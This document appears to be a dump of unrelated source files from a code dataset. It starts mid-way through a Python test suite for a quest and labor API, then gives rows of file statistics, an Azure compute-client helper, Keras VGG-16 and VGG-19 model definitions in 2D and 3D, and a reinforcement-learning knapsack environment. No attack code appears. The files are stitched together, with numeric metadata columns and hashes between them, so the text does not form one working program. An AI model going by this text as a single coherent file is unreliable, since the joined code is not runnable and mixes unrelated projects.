"user": "system@example.com"}],
"limit": 10,
"offset": 0,
"totalEvents": 2
},
strip=["timestamp"]
)
# We start with 0 quests in the test data
assert_success(
client.get("/quests"),
{
"limit": 10,
"offset": 0,
"totalQuests": 0,
"quests": []
}
)
target_time = datetime.utcnow() + timedelta(days=7)
# Create a quest with system-maintenance required
assert_created(
client.create(
"/quests",
creator="johnny",
fateId=3,
targetTime=str(target_time),
description="This is a quest almighty",
hostnames=["example", "sample", "test"]
),
"/api/v1/quests/1"
)
# make sure we now have 5 events (we started with 2 and
# we just created 3)
assert_success(
client.get("/events"),
{
"limit": 10,
"offset": 0,
"totalEvents": 5
},
strip=["events"]
)
# Make sure we created the appropriate labors for this quest
assert_success(
client.get("/labors"),
{
"limit": 10,
"offset": 0,
"totalLabors": 3,
"labors": [{"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 3,
"targetTime": str(target_time),
"hostId": 1,
"fateId": 3,
"closingFateId": None,
"forOwner": True,
"forCreator": False,
"id": 1,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 4,
"targetTime": str(target_time),
"hostId": 2,
"fateId": 3,
"closingFateId": None,
"forOwner": True,
"forCreator": False,
"id": 2,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 5,
"targetTime": str(target_time),
"hostId": 3,
"fateId": 3,
"closingFateId": None,
"forOwner": True,
"forCreator": False,
"id": 3,
"startingLaborId": None,
"questId": 1}],
},
strip=["creationTime", "completionTime"]
)
# Ensure that the quest doesn't have a completion time yet
# Also, test two meta features: progress info and
# filtering to show only open labors
assert_success(
client.get("/quests/1?progressInfo=true"),
{
"creator": "johnny@example.com",
"description": "This is a quest almighty",
"id": 1,
"totalLabors": 3,
"unstartedLabors": 3,
"inprogressLabors": 0,
"completedLabors": 0,
"percentComplete": 0.0,
},
strip=["embarkTime", "creationTime", "completionTime", "targetTime"]
)
# Throw events that should trigger intermediate labors
client.create(
"/events",
questId=1,
user="testman@example.com",
eventTypeId=4,
note="There are intermediate triggering events"
)
# make sure we now have 8 events (we started with 2 and
# we created 3 at the start and 3 more just now)
assert_success(
client.get("/events"),
{
"limit": 10,
"offset": 0,
"totalEvents": 8
},
strip=["events"]
)
# Make sure we created the appropriate labors for this quest
assert_success(
client.get("/labors"),
{
"limit": 10,
"offset": 0,
"totalLabors": 6,
"labors": [{"ackTime": None,
"ackUser": None,
"completionEventId": 6,
"creationEventId": 3,
"targetTime": str(target_time),
"hostId": 1,
"fateId": 3,
"closingFateId": 4,
"forOwner": True,
"forCreator": False,
"id": 1,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": 7,
"creationEventId": 4,
"targetTime": str(target_time),
"hostId": 2,
"fateId": 3,
"closingFateId": 4,
"forOwner": True,
"forCreator": False,
"id": 2,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": 8,
"creationEventId": 5,
"targetTime": str(target_time),
"hostId": 3,
"fateId": 3,
"closingFateId": 4,
"forOwner": True,
"forCreator": False,
"id": 3,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 6,
"targetTime": str(target_time),
"hostId": 1,
"fateId": 4,
"closingFateId": None,
"id": 4,
"forOwner": False,
"forCreator": True,
"startingLaborId": 1,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 7,
"targetTime": str(target_time),
"hostId": 2,
"fateId": 4,
"closingFateId": None,
"forOwner": False,
"forCreator": True,
"id": 5,
"startingLaborId": 2,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 8,
"targetTime": str(target_time),
"hostId": 3,
"forOwner": False,
"forCreator": True,
"fateId": 4,
"closingFateId": None,
"id": 6,
"startingLaborId": 3,
"questId": 1}]
},
strip=["creationTime", "completionTime"]
)
# Ensure that the quest doesn't have a completion time yet
# Also, test two meta features: progress info and
# filtering to show only open labors
assert_success(
client.get("/quests/1?progressInfo=true&onlyOpenLabors=true&expand=labors&expand=eventtypes&expand=fates"),
{
"creator": "johnny@example.com",
"description": "This is a quest almighty",
"id": 1,
"totalLabors": 3,
"unstartedLabors": 0,
"inprogressLabors": 3,
"completedLabors": 0,
"percentComplete": 50.0,
"labors": [
{
"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 6,
"hostId": 1,
"forOwner": False,
"forCreator": True,
"id": 4,
"fateId": 4,
"closingFateId": None,
"fate": {
"creationEventType": {
"category": "system-maintenance",
"state": "ready",
"id": 4,
"description": "This system is ready for maintenance.",
"restricted": False,
},
"creationEventTypeId": 4,
"description": "A system that needs maintenance made ready before maintenance can occur.",
"followsId": 3,
"forOwner": False,
"forCreator": True,
"id": 4,
"precedesIds": [5],
},
"closingFate": None,
"startingLaborId": 1,
"questId": 1
},
{
"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 7,
"hostId": 2,
"forOwner": False,
"forCreator": True,
"id": 5,
"fateId": 4,
"closingFateId": None,
"fate": {
"creationEventType": {
"category": "system-maintenance",
"state": "ready",
"id": 4,
"description": "This system is ready for maintenance.",
"restricted": False,
},
"creationEventTypeId": 4,
"description": "A system that needs maintenance made ready before maintenance can occur.",
"followsId": 3,
"forOwner": False,
"forCreator": True,
"id": 4,
"precedesIds": [5],
},
"closingFate": None,
"startingLaborId": 2,
"questId": 1
},
{
"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 8,
"hostId": 3,
"forOwner": False,
"forCreator": True,
"id": 6,
"fateId": 4,
"closingFateId": None,
"fate": {
"creationEventType": {
"category": "system-maintenance",
"state": "ready",
"id": 4,
"description": "This system is ready for maintenance.",
"restricted": False,
},
"creationEventTypeId": 4,
"description": "A system that needs maintenance made ready before maintenance can occur.",
"followsId": 3,
"forOwner": False,
"forCreator": True,
"id": 4,
"precedesIds": [5],
},
"closingFate": None,
"startingLaborId": 3,
"questId": 1
}
]
},
strip=["embarkTime", "creationTime", "completionTime", "targetTime"]
)
# Throw events that should trigger closing of the intermediate labors
client.create(
"/events",
questId=1,
user="testman@example.com",
eventTypeId=5,
note="There are intermediate triggering events"
)
# make sure we now have 11 events
assert_success(
client.get("/events"),
{
"limit": 10,
"offset": 0,
"totalEvents": 11
},
strip=["events"]
)
# Make sure we created the appropriate labors for this quest
assert_success(
client.get("/labors"),
{
"limit": 10,
"offset": 0,
"totalLabors": 6,
"labors": [{"ackTime": None,
"ackUser": None,
"completionEventId": 6,
"creationEventId": 3,
"targetTime": str(target_time),
"hostId": 1,
"forOwner": True,
"forCreator": False,
"id": 1,
"fateId": 3,
"closingFateId": 4,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": 7,
"creationEventId": 4,
"targetTime": str(target_time),
"hostId": 2,
"forOwner": True,
"forCreator": False,
"id": 2,
"fateId": 3,
"closingFateId": 4,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": 8,
"creationEventId": 5,
"targetTime": str(target_time),
"hostId": 3,
"forOwner": True,
"forCreator": False,
"id": 3,
"fateId": 3,
"closingFateId": 4,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": 9,
"creationEventId": 6,
"targetTime": str(target_time),
"hostId": 1,
"forOwner": False,
"forCreator": True,
"id": 4,
"fateId": 4,
"closingFateId": 5,
"startingLaborId": 1,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": 10,
"creationEventId": 7,
"targetTime": str(target_time),
"hostId": 2,
"forOwner": False,
"forCreator": True,
"fateId": 4,
"closingFateId": 5,
"id": 5,
"startingLaborId": 2,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": 11,
"creationEventId": 8,
"targetTime": str(target_time),
"hostId": 3,
"forOwner": False,
"forCreator": True,
"fateId": 4,
"closingFateId": 5,
"id": 6,
"startingLaborId": 3,
"questId": 1}]
},
strip=["creationTime", "completionTime"]
)
# Ensure that the quest doesn't have a completion time yet
quest_info = client.get("/quests/1").json()
assert quest_info["completionTime"] is not None
assert_success(
client.get("/labors/?startingLaborId=3"),
{
"limit": 10,
"offset": 0,
"totalLabors": 2,
"labors": [{"ackTime": None,
"ackUser": None,
"completionEventId": 8,
"creationEventId": 5,
"targetTime": str(target_time),
"hostId": 3,
"forOwner": True,
"forCreator": False,
"id": 3,
"fateId": 3,
"closingFateId": 4,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": 11,
"creationEventId": 8,
"targetTime": str(target_time),
"hostId": 3,
"forOwner": False,
"forCreator": True,
"id": 6,
"fateId": 4,
"closingFateId": 5,
"startingLaborId": 3,
"questId": 1}]
},
strip=["creationTime", "completionTime"]
)
assert_success(
client.get("/quests/1?progressInfo=true&onlyOpenLabors=true&expand=labors"),
{
"creator": "johnny@example.com",
"description": "This is a quest almighty",
"id": 1,
"totalLabors": 3,
"unstartedLabors": 0,
"inprogressLabors": 0,
"completedLabors": 3,
"percentComplete": 100.0,
"labors": [
]
},
strip=["embarkTime", "creationTime", "completionTime", "targetTime"]
)
def test_filter_by_creator(sample_data1_server):
client = sample_data1_server
# We start with 0 quests in the test data
assert_success(
client.get("/quests"),
{
"limit": 10,
"offset": 0,
"totalQuests": 0,
"quests": []
}
)
# Have johnny create a quest
assert_created(
client.create(
"/quests",
creator="johnny@example.com",
fateId=1,
description="This is a quest almighty",
hostnames=["example", "sample", "test"]
),
"/api/v1/quests/1"
)
# Have bonny create a quest
assert_created(
client.create(
"/quests",
creator="bonny@example.com",
fateId=1,
description="This is a quest not so almighty",
hostnames=["example", "sample", "test"]
),
"/api/v1/quests/2"
)
assert_success(
client.get("/quests"),
{
"limit": 10,
"offset": 0,
"totalQuests": 2
},
strip=["quests"]
)
quest_1 = client.get("/quests?byCreator=johnny@example.com").json()
quest_2 = client.get("/quests?byCreator=bonny@example.com").json()
assert len(quest_1['quests']) == 1
assert quest_1['quests'][0]['id'] == 1
assert len(quest_2['quests']) == 1
assert quest_2['quests'][0]['id'] == 2
assert_success(
client.get("/quests?byCreator=noone@example.com"),
{
"limit": 10,
"offset": 0,
"totalQuests": 0
},
strip=["quests"]
)
def test_filter_by_hostnames(sample_data1_server):
client = sample_data1_server
# We start with 0 quests in the test data
assert_success(
client.get("/quests"),
{
"limit": 10,
"offset": 0,
"totalQuests": 0,
"quests": []
}
)
# Have johnny create a quest
assert_created(
client.create(
"/quests",
creator="johnny@example.com",
fateId=1,
description="This is a quest almighty",
hostnames=["sample"]
),
"/api/v1/quests/1"
)
# Have bonny create a quest
assert_created(
client.create(
"/quests",
creator="bonny@example.com",
fateId=1,
description="This is a quest not so almighty",
hostnames=["example", "sample", "test"]
),
"/api/v1/quests/2"
)
assert_success(
client.get("/quests"),
{
"limit": 10,
"offset": 0,
"totalQuests": 2
},
strip=["quests"]
)
quest_1 = client.get("/quests?hostnames=example,test").json()
quest_2 = client.get("/quests?hostnames=sample").json()
assert len(quest_1['quests']) == 1
assert quest_1['quests'][0]['id'] == 2
assert len(quest_2['quests']) == 2
assert quest_2['quests'][0]['id'] == 1
assert quest_2['quests'][1]['id'] == 2
assert_success(
client.get("/quests?hostnames=not-a-server"),
{
"limit": 10,
"offset": 0,
"totalQuests": 0
},
strip=["quests"]
)
| 31.957637
| 115
| 0.407556
| 2,129
| 28,666
| 5.426022
| 0.090183
| 0.028566
| 0.050987
| 0.05142
| 0.894564
| 0.872663
| 0.848598
| 0.807479
| 0.769217
| 0.753809
| 0
| 0.025253
| 0.476453
| 28,666
| 896
| 116
| 31.993304
| 0.74447
| 0.054141
| 0
| 0.777778
| 0
| 0.001263
| 0.257776
| 0.014629
| 0
| 0
| 0
| 0
| 0.063131
| 1
| 0.007576
| false
| 0
| 0.008838
| 0
| 0.016414
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4062a3546935b03c5dd2cf755f06a125d0eb0b0f
| 271
|
py
|
Python
|
src/api-service/__app__/onefuzzlib/azure/compute.py
|
tonybaloney/onefuzz
|
e0f2e9ed5aae006e0054387de7a0ff8c83c8f722
|
[
"MIT"
] | 2,692
|
2020-09-15T17:54:21.000Z
|
2022-03-31T11:58:57.000Z
|
src/api-service/__app__/onefuzzlib/azure/compute.py
|
tonybaloney/onefuzz
|
e0f2e9ed5aae006e0054387de7a0ff8c83c8f722
|
[
"MIT"
] | 980
|
2020-09-18T18:23:01.000Z
|
2022-03-30T22:20:43.000Z
|
src/api-service/__app__/onefuzzlib/azure/compute.py
|
nharper285/onefuzz
|
1de2cc841d6fc885f8bcb6d032bf5b96ddb52493
|
[
"MIT"
] | 177
|
2020-09-16T00:10:56.000Z
|
2022-03-30T21:18:10.000Z
|
from azure.mgmt.compute import ComputeManagementClient
from memoization import cached
from .creds import get_identity, get_subscription
@cached
def get_compute_client() -> ComputeManagementClient:
return ComputeManagementClient(get_identity(), get_subscription())
| 27.1
| 70
| 0.833948
| 29
| 271
| 7.586207
| 0.517241
| 0.1
| 0.127273
| 0.236364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103321
| 271
| 9
| 71
| 30.111111
| 0.90535
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0.5
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
409afcd3d0ee84dde3b20a6bb1c924c2bc7a6126
| 7,389
|
py
|
Python
|
PrognosAIs/Model/Architectures/VGG.py
|
Svdvoort/prognosais
|
f5f144a2aac5610ea2450392853aa37bce311085
|
[
"Apache-2.0"
] | 3
|
2020-11-10T09:21:51.000Z
|
2021-01-12T15:14:19.000Z
|
PrognosAIs/Model/Architectures/VGG.py
|
Svdvoort/prognosais
|
f5f144a2aac5610ea2450392853aa37bce311085
|
[
"Apache-2.0"
] | 38
|
2020-11-18T14:19:25.000Z
|
2022-03-17T09:28:48.000Z
|
PrognosAIs/Model/Architectures/VGG.py
|
Svdvoort/prognosais
|
f5f144a2aac5610ea2450392853aa37bce311085
|
[
"Apache-2.0"
] | null | null | null |
from PrognosAIs.Model.Architectures.Architecture import ClassificationNetworkArchitecture
from tensorflow.keras.layers import Conv2D
from tensorflow.keras.layers import Conv3D
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import Dropout
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import MaxPooling2D
from tensorflow.keras.layers import MaxPooling3D
from tensorflow.keras.models import Model
class VGG(ClassificationNetworkArchitecture):
def init_dimensionality(self, N_dimension):
if N_dimension == 2:
self.dims = 2
self.conv_func = Conv2D
self.pool_func = MaxPooling2D
elif N_dimension == 3:
self.dims = 3
self.conv_func = Conv3D
self.pool_func = MaxPooling3D
def get_VGG_block(self, layer, N_filters, N_conv_layer):
stride_size = self.get_corrected_stride_size(layer, [2] * self.dims, [2] * self.dims)
pooling = self.pool_func(pool_size=[2] * self.dims, strides=stride_size, padding="valid")(
layer
)
conv = self.conv_func(
filters=N_filters,
kernel_size=[3] * self.dims,
strides=[1] * self.dims,
padding="same",
activation="relu",
)(pooling)
for i_conv_layer in range(N_conv_layer - 1):
conv = self.conv_func(
filters=N_filters,
kernel_size=[3] * self.dims,
strides=[1] * self.dims,
padding="same",
activation="relu",
)(conv)
return conv
class VGG_16_2D(VGG):
dims = 2
def create_model(self):
self.init_dimensionality(self.dims)
self.check_minimum_input_size(self.inputs, [24, 24])
conv_1 = Conv2D(
filters=64, kernel_size=[3, 3], strides=[1, 1], padding="same", activation="relu",
)(self.inputs)
conv_2 = Conv2D(
filters=64, kernel_size=[3, 3], strides=[1, 1], padding="same", activation="relu",
)(conv_1)
vgg_block_1 = self.get_VGG_block(conv_2, 128, 2)
vgg_block_1 = self.make_dropout_layer(vgg_block_1)
vgg_block_2 = self.get_VGG_block(vgg_block_1, 256, 3)
vgg_block_2 = self.make_dropout_layer(vgg_block_2)
vgg_block_3 = self.get_VGG_block(vgg_block_2, 512, 3)
vgg_block_3 = self.make_dropout_layer(vgg_block_3)
vgg_block_4 = self.get_VGG_block(vgg_block_3, 512, 3)
stride_size = self.get_corrected_stride_size(vgg_block_4, [2, 2], [2, 2])
pooling_1 = MaxPooling2D(pool_size=[2, 2], strides=stride_size, padding="valid",)(
vgg_block_4
)
flatten_1 = Flatten()(pooling_1)
flatten_1 = self.make_dropout_layer(flatten_1)
dense_1 = Dense(4096, activation="relu")(flatten_1)
dense_2 = Dense(4096, activation="relu")(dense_1)
predictions = self.outputs(dense_2)
model = Model(inputs=self.inputs, outputs=predictions)
return model
class VGG_16_3D(VGG):
dims = 3
def create_model(self):
self.init_dimensionality(self.dims)
self.check_minimum_input_size(self.inputs, [24, 24, 24])
conv_1 = Conv3D(
filters=64, kernel_size=[3, 3, 3], strides=[1, 1, 1], padding="same", activation="relu",
)(self.inputs)
conv_2 = Conv3D(
filters=64, kernel_size=[3, 3, 3], strides=[1, 1, 1], padding="same", activation="relu",
)(conv_1)
vgg_block_1 = self.get_VGG_block(conv_2, 128, 2)
vgg_block_1 = self.make_dropout_layer(vgg_block_1)
vgg_block_2 = self.get_VGG_block(vgg_block_1, 256, 3)
vgg_block_2 = self.make_dropout_layer(vgg_block_2)
vgg_block_3 = self.get_VGG_block(vgg_block_2, 512, 3)
vgg_block_3 = self.make_dropout_layer(vgg_block_3)
vgg_block_4 = self.get_VGG_block(vgg_block_3, 512, 3)
stride_size = self.get_corrected_stride_size(vgg_block_4, [2, 2, 2], [2, 2, 2])
pooling_1 = MaxPooling3D(pool_size=[2, 2, 2], strides=stride_size, padding="valid",)(
vgg_block_4
)
flatten_1 = Flatten()(pooling_1)
flatten_1 = self.make_dropout_layer(flatten_1)
dense_1 = Dense(4096, activation="relu")(flatten_1)
dense_2 = Dense(4096, activation="relu")(dense_1)
predictions = self.outputs(dense_2)
model = Model(inputs=self.inputs, outputs=predictions)
return model
class VGG_19_2D(VGG):
dims = 2
def create_model(self):
self.init_dimensionality(self.dims)
self.check_minimum_input_size(self.inputs, [24, 24])
conv_1 = Conv2D(
filters=64, kernel_size=[3, 3], strides=[1, 1], padding="same", activation="relu",
)(self.inputs)
conv_2 = Conv2D(
filters=64, kernel_size=[3, 3], strides=[1, 1], padding="same", activation="relu",
)(conv_1)
vgg_block_1 = self.get_VGG_block(conv_2, 128, 2)
vgg_block_1 = self.make_dropout_layer(vgg_block_1)
vgg_block_2 = self.get_VGG_block(vgg_block_1, 256, 4)
vgg_block_2 = self.make_dropout_layer(vgg_block_2)
vgg_block_3 = self.get_VGG_block(vgg_block_2, 512, 4)
vgg_block_3 = self.make_dropout_layer(vgg_block_3)
vgg_block_4 = self.get_VGG_block(vgg_block_3, 512, 4)
stride_size = self.get_corrected_stride_size(vgg_block_4, [2, 2], [2, 2])
pooling_1 = MaxPooling2D(pool_size=[2, 2], strides=stride_size, padding="valid",)(
vgg_block_4
)
flatten_1 = Flatten()(pooling_1)
flatten_1 = self.make_dropout_layer(flatten_1)
dense_1 = Dense(4096, activation="relu")(flatten_1)
dense_2 = Dense(4096, activation="relu")(dense_1)
predictions = self.outputs(dense_2)
model = Model(inputs=self.inputs, outputs=predictions)
return model
class VGG_19_3D(VGG):
dims = 3
def create_model(self):
self.init_dimensionality(self.dims)
self.check_minimum_input_size(self.inputs, [24, 24, 24])
conv_1 = Conv3D(
filters=64, kernel_size=[3, 3, 3], strides=[1, 1, 1], padding="same", activation="relu",
)(self.inputs)
conv_2 = Conv3D(
filters=64, kernel_size=[3, 3, 3], strides=[1, 1, 1], padding="same", activation="relu",
)(conv_1)
vgg_block_1 = self.get_VGG_block(conv_2, 128, 2)
vgg_block_1 = self.make_dropout_layer(vgg_block_1)
vgg_block_2 = self.get_VGG_block(vgg_block_1, 256, 4)
vgg_block_2 = self.make_dropout_layer(vgg_block_2)
vgg_block_3 = self.get_VGG_block(vgg_block_2, 512, 4)
vgg_block_3 = self.make_dropout_layer(vgg_block_3)
vgg_block_4 = self.get_VGG_block(vgg_block_3, 512, 4)
stride_size = self.get_corrected_stride_size(vgg_block_4, [2, 2, 2], [2, 2, 2])
pooling_1 = MaxPooling3D(pool_size=[2, 2, 2], strides=stride_size, padding="valid",)(
vgg_block_4
)
flatten_1 = Flatten()(pooling_1)
flatten_1 = self.make_dropout_layer(flatten_1)
dense_1 = Dense(4096, activation="relu")(flatten_1)
dense_2 = Dense(4096, activation="relu")(dense_1)
predictions = self.outputs(dense_2)
model = Model(inputs=self.inputs, outputs=predictions)
return model
| 36.945
| 100
| 0.638923
| 1,044
| 7,389
| 4.205939
| 0.070881
| 0.140287
| 0.042587
| 0.054657
| 0.882259
| 0.818948
| 0.818948
| 0.810749
| 0.810749
| 0.810749
| 0
| 0.065756
| 0.246718
| 7,389
| 199
| 101
| 37.130653
| 0.723141
| 0
| 0
| 0.769231
| 0
| 0
| 0.018541
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.057692
| 0
| 0.185897
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
40ad88d876c0782fe2302ed58a80759d32cba1b1
| 18,433
|
py
|
Python
|
reinforcement_learning/rl_knapsack_coach_custom/src/knapsack_env.py
|
jpmarques19/tensorflwo-test
|
0ff8b06e0415075c7269820d080284a42595bb2e
|
[
"Apache-2.0"
] | 5
|
2019-01-19T23:53:35.000Z
|
2022-01-29T14:04:31.000Z
|
reinforcement_learning/rl_knapsack_coach_custom/src/knapsack_env.py
|
jpmarques19/tensorflwo-test
|
0ff8b06e0415075c7269820d080284a42595bb2e
|
[
"Apache-2.0"
] | 6
|
2020-01-28T23:08:49.000Z
|
2022-02-10T00:27:19.000Z
|
reinforcement_learning/rl_knapsack_coach_custom/src/knapsack_env.py
|
jpmarques19/tensorflwo-test
|
0ff8b06e0415075c7269820d080284a42595bb2e
|
[
"Apache-2.0"
] | 8
|
2020-12-14T15:49:24.000Z
|
2022-03-23T18:38:36.000Z
|
import gym
from gym import spaces
import numpy as np
import queue
import csv
from capacity import Capacity
from item import Item
from knapsack_baseline import get_knapsack_solution_simple
from knapsack_baseline import get_knapsack_solution_medium
from knapsack_baseline import get_knapsack_benchmark_sol_hard_greedy_heuristic
from knapsack_view_2D import KnapsackView2D
class KnapSackEnv(gym.Env):
def render(self, mode="human"):
if self.knapsack_view is None:
self.knapsack_view = KnapsackView2D(bag_weight_capacity=self.bag_weight_capacity,
max_item_value=self.max_item_value)
return self.knapsack_view.update(mode=mode, selected_item_queue=self.selected_item_queue,
reward=self.total_reward, item=self.item,
bag_weight=self.bag_weight, bag_value=self.bag_value)
def __init__(self):
self.min_weight_capacity = Capacity.min_weight
self.max_weight_capacity = Capacity.max_weight
self.max_item_value = 100
self.drop_penalty = -10
self.time_horizon = 20
self.bag_weight = None
self.bag_weight_capacity = None
self.bag_value = None
self.time_remaining = None
self.item = None
self.items_list = []
self.selected_item_queue = None
self.total_reward = 0
self.episode_count = 0
self.knapsack_view = None
self.csv_file = 'knapsack_easy.csv'
# Note: can collapse capacity and sum of weights into one dimension and can remove sum of values
# state: capacity,
# sum of weights of items,
# sum of values of items,
# item weight,
# item value,
# time remaining,
self.observation_space = spaces.Box(low=np.array([self.min_weight_capacity, 0, 0, 0, 0, 0]),
high=np.array([self.max_weight_capacity, # bag capacity
self.max_weight_capacity, # sum of weights in bag
np.inf, # sum of values in bag
self.max_weight_capacity, # item weight
self.max_item_value, # item value
self.time_horizon, # time remaining
]), dtype=np.uint32)
# actions: 0 -> don't put the item in the bag,
# 1 -> put the item in the bag,
self.action_space = spaces.Discrete(2)
def reset(self):
if self.episode_count == 0:
self.create_baseline_csv()
self.bag_weight = 0
self.bag_value = 0
self.time_remaining = self.time_horizon
self.bag_weight_capacity = np.random.randint(self.min_weight_capacity, self.max_weight_capacity)
self.item = Item.get_random_item(max_weight=Capacity.max_weight, max_value=self.max_item_value)
self.items_list = [self.item]
initial_state = [self.bag_weight_capacity,
self.bag_weight,
self.bag_value,
self.item.weight,
self.item.value,
self.time_remaining,
]
self.selected_item_queue = queue.Queue()
self.total_reward = 0
self.episode_count += 1
self.knapsack_view = None
return initial_state
def step(self, action):
done = False
if action == Action.THROW: # don't put item in bag
reward = self.drop_penalty
elif action == Action.PUT: # put the item in bag
if self.bag_weight_capacity < self.bag_weight + self.item.weight:
# drop the item
reward = self.drop_penalty
else:
self.selected_item_queue.put(self.item)
self.bag_weight += self.item.weight
self.bag_value += self.item.value
reward = self.item.value
else:
raise ValueError("Invalid action {}".format(action))
self.total_reward += reward
self.time_remaining -= 1
if self.time_remaining == 0:
done = True
if done:
# get baseline results
weights = [x.weight for x in self.items_list]
values = [x.value for x in self.items_list]
result = get_knapsack_solution_simple(weights, values,
self.bag_weight_capacity, self.drop_penalty)
print("Baseline reward: ", result[0], "RL Reward: ", self.total_reward)
# Save it to file
with open(self.csv_file, 'a') as f:
writer = csv.writer(f)
writer.writerow([self.episode_count, self.total_reward, result[0]])
self.item = Item.get_random_item(max_weight=Capacity.max_weight, max_value=self.max_item_value)
self.items_list += [self.item]
state = [self.bag_weight_capacity,
self.bag_weight,
self.bag_value,
self.item.weight,
self.item.value,
self.time_remaining,
]
info = {}
return state, reward, done, info
def create_baseline_csv(self):
header = ["Episode", "RL Reward", "Baseline Reward"]
with open(self.csv_file, 'w') as f:
writer = csv.writer(f)
writer.writerow(header)
class KnapSackMediumEnv(KnapSackEnv):
def render(self, mode="human"):
if self.knapsack_view is None:
self.knapsack_view = KnapsackView2D(bag_weight_capacity=self.bag_weight_capacity,
max_item_value=self.max_item_value,
bag_volume_capacity=self.bag_volume_capacity)
return self.knapsack_view.update(mode=mode, selected_item_queue=self.selected_item_queue,
reward=self.total_reward, item=self.item,
bag_weight=self.bag_weight, bag_volume=self.bag_volume,
bag_value=self.bag_value)
def __init__(self):
super().__init__()
self.bag_volume = None
self.bag_volume_capacity = None
self.time_horizon = 50
self.csv_file = 'knapsack_medium.csv'
# Note: can collapse capacity and sum of weights into one dimension and can remove sum of values
# state: weight_capacity,
# volume_capacity,
# sum of volumes of items,
# sum of weights of items,
# sum of values of items,
# item weight,
# item volume,
# item value,
# time remaining,
self.observation_space = spaces.Box(low=np.array([Capacity.min_weight,
Capacity.min_volume,
0, 0, 0, 0, 0, 0, 0]),
high=np.array([Capacity.max_weight, # bag weight capacity
Capacity.max_volume, # bag volume capacity
Capacity.max_weight, # sum of weights in bag
Capacity.max_volume, # sum of volume in bag
np.inf, # sum of values in bag
Capacity.max_weight, # item weight
Capacity.max_volume, # item volume
self.max_item_value, # item value
self.time_horizon, # time remaining
]))
def reset(self):
if self.episode_count == 0:
self.create_baseline_csv()
self.bag_weight = 0
self.bag_volume = 0
self.bag_value = 0
self.time_remaining = self.time_horizon
self.bag_weight_capacity = np.random.randint(Capacity.min_weight, Capacity.max_weight)
self.bag_volume_capacity = np.random.randint(Capacity.min_volume, Capacity.max_volume)
self.item = Item.get_random_item(max_value=self.max_item_value, max_weight=Capacity.max_weight,
max_volume=Capacity.max_volume)
self.items_list = [self.item]
initial_state = [self.bag_weight_capacity,
self.bag_volume_capacity,
self.bag_weight,
self.bag_volume,
self.bag_value,
self.item.weight,
self.item.volume,
self.item.value,
self.time_remaining,
]
self.selected_item_queue = queue.Queue()
self.total_reward = 0
self.episode_count += 1
self.knapsack_view = None
return initial_state
def step(self, action):
done = False
if action == Action.THROW: # don't put item in bag
reward = self.drop_penalty
elif action == Action.PUT: # put the item in bag
if (self.bag_weight_capacity < self.bag_weight + self.item.weight) \
or (self.bag_volume_capacity < self.bag_volume + self.item.volume):
# drop the item
reward = self.drop_penalty
else:
self.selected_item_queue.put(self.item)
self.bag_weight += self.item.weight
self.bag_volume += self.item.volume
self.bag_value += self.item.value
reward = self.item.value
else:
raise ValueError("Invalid action {}".format(action))
self.total_reward += reward
self.time_remaining -= 1
if self.time_remaining == 0:
done = True
if done:
# get baseline results
if self.episode_count % 50 == 0:
weights = [x.weight for x in self.items_list]
volumes = [x.volume for x in self.items_list]
values = [x.value for x in self.items_list]
result = get_knapsack_solution_medium(weights, volumes, values,
self.bag_weight_capacity, self.bag_volume_capacity,
self.drop_penalty)
print("Baseline reward: ", result[0], "RL Reward: ", self.total_reward)
# Save it to file
with open(self.csv_file, 'a') as f:
writer = csv.writer(f)
writer.writerow([self.episode_count, self.total_reward, result[0]])
self.item = Item.get_random_item(max_value=self.max_item_value, max_weight=Capacity.max_weight,
max_volume=Capacity.max_volume)
self.items_list += [self.item]
state = [self.bag_weight_capacity,
self.bag_volume_capacity,
self.bag_weight,
self.bag_volume,
self.bag_value,
self.item.weight,
self.item.volume,
self.item.value,
self.time_remaining,
]
info = {}
return state, reward, done, info
